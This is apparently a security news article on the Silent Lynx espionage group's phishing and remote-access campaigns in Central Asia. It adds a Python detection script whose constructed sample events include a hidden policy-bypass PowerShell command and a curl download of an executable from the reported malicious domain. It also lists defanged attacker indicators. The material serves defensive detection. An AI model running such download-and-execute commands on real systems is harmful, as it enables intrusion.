A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.
“This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector,” Seqrite Labs researcher Subhajeet Singha said in a technical report published late last month.
Targets of the hacking group’s attacks include embassies, lawyers, government-backed banks, and think tanks. The activity has been attributed to a Kazakhstan-origin threat actor with a medium level of confidence.
The infections begin with a spear-phishing email containing a RAR archive attachment that ultimately acts as a delivery vehicle for malicious payloads responsible for granting remote access to the compromised hosts.
The first of the two campaigns, detected by the cybersecurity company on December 27, 2024, leverages the RAR archive to launch an ISO file that, in turn, includes a malicious C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that uses Telegram bots (named “@south_korea145_bot” and “@south_afr_angl_bot”) for command execution and data exfiltration.
Some of the commands executed via the bots include curl commands to download and save additional payloads from a remote server (“pweobmxdlboi[.]com”) or Google Drive.
The other campaign, in contrast, employs a malicious RAR archive containing two files: a decoy PDF and a Golang executable, the latter of which is designed to establish a reverse shell to an attacker-controlled server (“185.122.171[.]22:8082”).
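The chain described above (a loader spawning hidden PowerShell, PowerShell talking to the Telegram Bot API, and scripted curl downloads into a temp directory) is the kind of behaviour endpoint telemetry can surface. The following is an added detection example, not code from Seqrite Labs or the article; the event format is a constructed, Sysmon-like simplification and the sample events are made up to exercise the rules.

```python
import re

# Constructed sample telemetry (process creation + network destination), not real logs.
# Event 1 mirrors the first campaign's PowerShell/Telegram stage; event 2 the scripted curl
# download from the server named in the report; events 3 and 4 are benign noise.
SAMPLE_EVENTS = [
    {"pid": 1, "image": "powershell.exe", "parent": "loader.exe",
     "cmdline": "powershell -w hidden -ep bypass -f C:\\Users\\u\\AppData\\Local\\Temp\\a.ps1",
     "dest": "api.telegram.org:443"},
    {"pid": 2, "image": "curl.exe", "parent": "powershell.exe",
     "cmdline": "curl -o C:\\Users\\u\\AppData\\Local\\Temp\\x.exe https://pweobmxdlboi.com/x",
     "dest": "pweobmxdlboi.com:443"},
    {"pid": 3, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell Get-ChildItem", "dest": ""},
    {"pid": 4, "image": "curl.exe", "parent": "cmd.exe",
     "cmdline": "curl https://example.org", "dest": "example.org:443"},
]

TELEGRAM_API = "api.telegram.org"          # public Telegram Bot API endpoint
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = SHELLS | {"cmd.exe", "wscript.exe", "cscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden|-(?:ep|executionpolicy)\s+bypass", re.I)
CURL_SAVE = re.compile(r"\s(?:-o|--output)\s", re.I)

def detect(events):
    """Return (pid, rule_name) pairs for events matching the reported TTPs."""
    findings = []
    for e in events:
        img, parent = e["image"].lower(), e["parent"].lower()
        cmd, host = e["cmdline"], e["dest"].split(":")[0].lower()
        # PowerShell reaching the Telegram Bot API: bots used as C2 in the first campaign.
        if img in SHELLS and host == TELEGRAM_API:
            findings.append((e["pid"], "powershell_to_telegram_bot_api"))
        # Hidden / policy-bypassing PowerShell launched by something other than a user shell,
        # consistent with the C++ loader stage.
        if img in SHELLS and HIDDEN_PS.search(cmd) and parent not in INTERACTIVE_PARENTS:
            findings.append((e["pid"], "hidden_powershell_from_unusual_parent"))
        # curl spawned from a script host saving a payload under a Temp directory.
        if img == "curl.exe" and parent in SCRIPT_HOSTS and CURL_SAVE.search(cmd) \
                and "\\temp\\" in cmd.lower():
            findings.append((e["pid"], "scripted_curl_download_to_temp"))
    return findings

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule is deliberately narrow and should be combined with the host's usual baseline; Telegram API traffic from PowerShell is the strongest signal of the three in the context of this report.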
Seqrite Labs said it observed some level of tactical overlap between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.
“Silent Lynx’s campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants,” Singha said.
“Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, also highlights their focus on espionage in Central Asia and SPECA-based nations.”